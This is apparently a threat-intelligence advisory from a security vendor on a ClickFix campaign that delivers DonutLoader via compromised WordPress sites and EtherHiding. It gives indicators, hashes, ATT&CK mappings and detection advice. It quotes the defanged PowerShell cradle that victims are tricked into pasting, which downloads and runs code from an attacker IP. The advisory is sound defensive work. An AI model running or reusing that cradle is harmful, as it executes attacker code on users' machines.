SL-ADV-2026-WP-001 · Version 12

Unknown APT (AS202412) — ClickFix → BSC EtherHiding → DonutLoader

V12 wave · unattributed actor on AS202412 infra · lure ejecutivos.es · C2 senterprise2026.com
SEVERITY: HIGH TLP:CLEAR Actor: UNKNOWN APT · AS202412 infra Continuity: infra-confirmed (same unattributed actor) Published 2026-07-07 · Dispensight / SecureLeaf

Executive summary

A twelfth iteration of this ClickFix cluster is live. The threat actor remains unattributed — we track it as an unknown APT using AS202412 infrastructure. ("Omegatech LTD" is the registered operator of AS202412, a Seychelles bulletproof-hosting AS — the infrastructure provider, not a confirmed actor identity.) Continuity with prior waves — i.e. the same unattributed actor — is confirmed by infrastructure reuse: the detonation contacts three IPs already in the SecureLeaf Omegatech corpus (158.94.208.104, 178.16.53.137, 91.92.240.121), retains BSC-testnet EtherHiding, and preserves the obfuscator.io RC4/rotate loader family, the /?sid= TDS pattern, student_*.bin payload naming (V9 lineage) and the .NET DonutLoader stage (V11). V12 introduces a new C2 domain acting as a verification / anti-replay node, a new stage-2 path, and fully-encoded network strings that defeat signatures gated on cleartext eth_call.

Kill chain (V12)

Compromised lure. Victim loads ejecutivos.es (WordPress/Avada — Revista Ejecutivos). An obfuscator.io loader is injected as 1 of 32 script blocks.
TDS. Loader beacons to dntds.shop; SID-tracked request /?sid=<epochms>-<rand>.
EtherHiding retained. Reads staging data from bsc-testnet-rpc.publicnode.com via eth_call (now fully encoded in the string-array).
ClickFix. Fake Cloudflare challenge tricks the user into pasting a PowerShell one-liner (below).
Verification node NEW. senterprise2026.com checks whether the SID already executed (confirmChallenge anti-replay).
Stage-2 evolved. /s_enterprise/ on 158.94.208.104 (was /my_enterprise/).
Payload. /x7GkP2mQ9zL4/student_s.bin — Donut shellcode (E8 GetPC, 53,323 B) + .NET loader (mscoree) compiled 2026-07-07.

ClickFix lure (defanged)

Clipboard payload the victim is social-engineered into pasting. The fake challengeHash is the SHA-256 of the empty string — a decoy to look legitimate.

<#Verification ID:9x0j8j268evkzp39 #>
$global:cfChallenge   = "challenge.cloudflare.com";
$global:challengeHash = "e3b0c442...b855";   # SHA-256("") decoy
$global:confirmChallenge = $true;
iex(irm hxxp://91[.]92[.]240[.]121/?sid=1783399818567-p3cptuik -UseBasicParsing)
<#Verification ID:9x0j8j268evkzp39 #>

Continuity vs evolution

TraitStatus in V12
Infra 158.94.208.104 / 178.16.53.137 / 91.92.240.121REUSED (same-actor proof)
BSC-testnet EtherHiding (bsc-testnet-rpc.publicnode.com)Retained (V11)
obfuscator.io string-array + rotate + RC4(0x100) + fromCharCodeRetained (V7–V11)
/?sid= TDS pattern · student_*.bin namingRetained (V11 · V9)
.NET / mscoree DonutLoader stageRetained (V11)
Compromised-legit lure deliveryRetained (splitcam → ejecutivos.es)
C2 domainNEW — senterprise2026.com (was digitalenterprise2026.com)
Verification / anti-replay nodeNEW — SID confirmChallenge tracking
Stage-2 pathEVOLVED — /s_enterprise/ (was /my_enterprise/)
eth_call / network stringsEVOLVED — fully encoded (defeats cleartext sigs)
Donut headerEVOLVED — plain E8 GetPC stub (no MZER polyglot header)

Indicators of compromise

Domains

IndicatorRole
senterprise2026.comC2 / verification node (NEW)
ejecutivos.esCompromised WordPress lure — verify before action
dntds.shopTDS / JS loader host
bsc-testnet-rpc.publicnode.comEtherHiding read — shared-legit, DO-NOT-BLOCKLIST

IPv4

IndicatorRolePrior
158.94.208.104Stage-2 /s_enterprise/ + payloadV11
178.16.53.137Payload hostprior
91.92.240.121ClickFix cradle (?sid=) · AS202412prior

URIs / paths

Pattern
/?sid=<epochms>-<rand>
/s_enterprise/ · /s_enterprise
/<random>/student_s.bin

File hashes (SHA-256)

ArtifactSHA-256
ejecutivos.es lure page954f9a7eda73674e96b63f768d2ac4cef3c32ece6eb02d030bef21a0b3481472
dntds.shop JS loadere88fbd4c3a4828256ae5f8508a3ec14337f808473aef08c43152810d68b5cc01
student_s.bin (Donut, 53,323 B)e1781032bf872f74afc534f01a7f490249d84521d0fe02773035716572b367db
.NET PE loader (284,160 B)67e88d988df4e94f62935f539ed257515773507592ad32642f1500350463882a

.NET loader imphash: edc8ef44e1870aad7a3e58dab17f8e1b · compiled 2026-07-07T00:48:10Z · unsigned

MITRE ATT&CK

T1189 Drive-by · T1584.004 Compromise Server · T1204.004 Malicious Copy-Paste (ClickFix) · T1059.001 PowerShell · T1102 Web Service (EtherHiding) · T1140 Deobfuscate · T1027.004 Compile After Delivery · T1105 Ingress Tool Transfer · T1055 Process Injection · T1071.001 Web C2

Detection & response

YARA: omegatech_v12.yar — 6 rules incl. a re-tuned obfuscator rule that no longer depends on cleartext eth_call (closes the V12 detection gap), a ClickFix-lure rule, network, known-hash and .NET-loader rules. STIX 2.1: SL-ADV-2026-WP-001-V12.stix.json.

Response: report ejecutivos.es compromise to its host / registrar; submit senterprise2026.com + reused IPs to AbuseIPDB / OTX; hunt endpoints for the ClickFix PowerShell cradle and mscoree-loaded child of powershell.exe. The BSC RPC endpoint is shared-legit — detect behaviourally, do not blocklist.

SL-ADV-2026-WP-001 V12 · Dispensight / SecureLeaf · secureleaf.dispensight.com · TAXII 2.1 taxii.dispensight.ca · TLP:CLEAR · defensive analysis only — no payload reproduced. © 2026 Dispensight.